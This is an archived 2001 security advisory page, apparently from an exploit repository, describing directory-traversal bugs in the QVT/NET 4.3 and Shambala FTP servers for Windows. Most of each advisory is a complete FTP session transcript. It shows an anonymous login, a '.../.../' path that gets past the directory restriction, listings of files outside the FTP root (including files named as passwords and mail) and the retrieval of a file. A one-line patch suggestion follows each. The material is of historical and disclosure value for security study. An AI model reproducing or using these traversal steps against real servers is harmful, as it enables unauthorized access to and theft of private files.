exploit the possibilities

alt3kx-advisories-2001.txt

alt3kx-advisories-2001.txt
Posted Jun 6, 2001
Authored by Alt3kx | Site raza-mexicana.org

The QVT/NET 4.3 FTP Server and the Shambala FTP Server for Windows 9x/NT/2000 contains remote vulnerabilities which allow users to see and retrieve any file on the server. Exploit information included.

tags | exploit, remote, vulnerability
systems | windows, 9x
MD5 | f31b863e65cf4e42820d482689e3046f

alt3kx-advisories-2001.txt

Change Mirror Download


======================================================================

QVT/NET 4.3 FTP server Directory Traversal


Author: alt3kx! <alt3kx@raza-mexicana.org>
Date: 2001-05-22
Site: www.raza-mexicana.org

Greet to: _0x90_, dr_fdisk^, Dex, PaTa
Teams: Raregazz - X-ploit and S0d

vicente F0x no rulas wey!
======================================================================
------------------------=[Brief Description]=-------------------------

QVT/NET FTP Server is an FTP server for Windows 9x/NT/2000.
A bug allows any user to change to any directory and see files to PATH
also GET files remotely.

----------------------------=[Plataforms]=-------------------------------

Windows 9.x
Windows NT
windows 2000


-----------------------------=[Summary]=---------------------------------


When sending the command "CWD ..." (or "cd ..." in the default FTP
client), the server will go one directory up.



EXploit:


C:\>ftp server.vulnerable.com
Connected to server.vulnerable.com.
220 shell FTP server (QVT/Net 4.3) ready.
User (server.vulnerable.com:(none)): anonymous
331 Guest login OK, please send real ident as password.
Password:
230 Guest login OK, access restrictions apply.
ftp> cd ..
501 CWD command not allowed.

SO THE BUG... ...

ftp>cd .../.../.../.../.../.../
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opened data connection for 'ls' (server.vulnerable.com,1105) (0 bytes).
-rwxrwxrwx 1 nobody system 246928 Jan 18 13:10 nc.exe
drwxrwxrwx 1 nobody system 0 Jan 18 15:39 Netscape 6
drwxrwxrwx 1 nobody system 0 Jan 18 14:50 Netscape 6 Setup
-rwxrwxrwx 1 nobody system 3209110 Jan 19 10:51 icq.exe
-rwxrwxrwx 1 nobody system 6330449 Jan 19 12:01 porn.exe
drwxrwxrwx 1 nobody system 0 Jan 18 17:44 norton
drwxrwxrwx 1 nobody system 0 Jan 19 11:14 Program Files
drwxrwxrwx 1 nobody system 0 Jan 19 12:04 plugins

.
.
.
.

-rwxrwxrwx 1 nobody system 0 May 4 13:05 hacksites.txt
drwxrwxrwx 1 nobody system 0 May 4 16:51 XXXX
drwxrwxrwx 1 nobody system 0 May 8 13:17 teens
drwxrwxrwx 1 nobody system 0 May 8 13:18 tmp
-rwxrwxrwx 1 nobody system 168 May 21 19:07 raza-alt3kx.txt
226 Transfer complete.
ftp: 7707 bytes received in 0.35Seconds 21.96Kbytes/sec.

ftp> get raza-alt3kx.txt
200 PORT command successful.
150 ASCII data connection for raza-alt3kx.txt (server.vulnerable.com,1106)
(168 bytes).
226 Transfer complete.
ftp: 168 bytes received in 0.02Seconds 8.40Kbytes/sec.
ftp>quit
221 Goodbye.



C:\>type raza-alt3kx.txt

Bug discovered by alt3kx! <alt3kx@raza-mexicana.org>


C:\>


-------------------------------=[Patch]=---------------------------------

The recomended action is to changue the persmissions or define
individual directory for users anonymous with files no compromise.

-------------------------=[Company Compromise]=--------------------------

Company:

http//www.qpc.com






======================================================================


Shambala FTP server Directory Traversal


Author: alt3kx! <alt3kx@raza-mexicana.org>
Date: 2001-05-22
Site: www.raza-mexicana.org

Greet to: _0x90_, dr_fdisk^, Dex, PaTa
Teams: Raregazz - X-ploit and S0d

vicente F0x no rulas weyete!
======================================================================
------------------------=[Brief Description]=-------------------------

Shambala FTP Server is an FTP server for Windows 9x/NT/2000.
A bug allows any user to change to any directory and see files to PATH
also GET files remotely.

----------------------------=[Plataforms]=-----------------------------

Windows 9.x
Windows NT
windows 2000


-----------------------------=[Summary]=---------------------------------


When sending the command "CWD ..." (or "cd ..." in the default FTP
client), the server will go one directory up.



Exploit:

alt3kx@machine:/tmp$ ftp 1.xx.xx.xx
Connected to 1.xx.xx.xx.
220 1.xx.xx.xx - Shambala FTP Server Ready.
Name (1.xx.xx.xx:Administrator): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> cd ..
550 Requested action not taken. Permission denied.
ftp> pwd
257 "/" is current directory.
ftp> dir
200 PORT command successful.
150 Opening data connection.
d--------- owner group 0 21-maj-01 17:50 1.xx.xx.xx
---------- owner group 283 21-maj-01 17:55
index-_-1_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-2_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-3_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-4_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-5_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-6_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-7_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-8_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-9_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-10_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-11_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-12_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-13_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-14_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-15_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_-16_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_0_0_0.htm
---------- owner group 283 21-maj-01 17:55
index-_0_0_-1.htm
---------- owner group 283 21-maj-01 17:55 .htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-2.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-3.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-4.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-5.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-6.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-7.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-8.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-9.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-10.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-11.htm
---------- owner group 283 21-maj-01 18:08
index-_0_0_-12.htm
---------- owner group 283 21-maj-01 18:08
index-_0_-1_-11.htm
---------- owner group 283 21-maj-01 18:08
index-_1_0_-11.htm
---------- owner group 283 21-maj-01 18:08
index-_-1_0_-11.htm

226 Transfer complete
ftp> cd ../
550 Requested action not taken. Permission denied.
ftp>

EXPLOIT... ...

ftp> cd /.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
---------- owner group 15444 04-maj-01 14:26 SCAN.log
---------- owner group 140340 04-maj-01 14:05
MAILS-PRESIDENCIA.txt
---------- owner group 466944 18-sep-99 09:32 Shambala.exe
---------- owner group 3564 21-maj-01 17:48 ST6UNST.LOG
---------- owner group 31 21-maj-01 17:50
passwordsxxx.txt
d--------- owner group 0 21-maj-01 17:50 Web
226 Transfer complete.
ftp>


ftp> cd /.../.../.../.../
257 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening data connection.
---------- owner group 246928 18-jan-01 13:10 N6Setup.exe
d--------- owner group 0 18-jan-01 15:39 Netscape 6
d--------- owner group 0 18-jan-01 14:50 Netscape 6
Setup
---------- owner group 3209110 19-jan-01 10:51 getrgt.exe

.
.
.
.
.

---------- owner group 168 21-maj-01 19:07
raza-alt3kx.txt

ftp> get raza-alt3kx.txt
200 PORT command successful.
150 Opening data connection.
226 Transfer complete.
168 bytes received in 0 seconds (168 bytes/s)
ftp> quit
221 Goodbye.


alt3kx@machine:/tmp$ cat raza-alt3kx.txt


Bug discovered by alt3kx! <alt3kx@raza-mexicana.org>


alt3kx@machine:/tmp$



-------------------------------=[Patch]=------------------------------

The recomended action is to changue the persmissions or define
individual directory for users anonymous with files not compromise.


-------------------------=[Company Compromise]=-----------------------

http://www.evolvable.com






Login or Register to add favorites

File Archive:

September 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    20 Files
  • 2
    Sep 2nd
    15 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    4 Files
  • 5
    Sep 5th
    1 Files
  • 6
    Sep 6th
    1 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    27 Files
  • 9
    Sep 9th
    7 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    9 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    25 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    15 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    12 Files
  • 19
    Sep 19th
    1 Files
  • 20
    Sep 20th
    1 Files
  • 21
    Sep 21st
    15 Files
  • 22
    Sep 22nd
    21 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close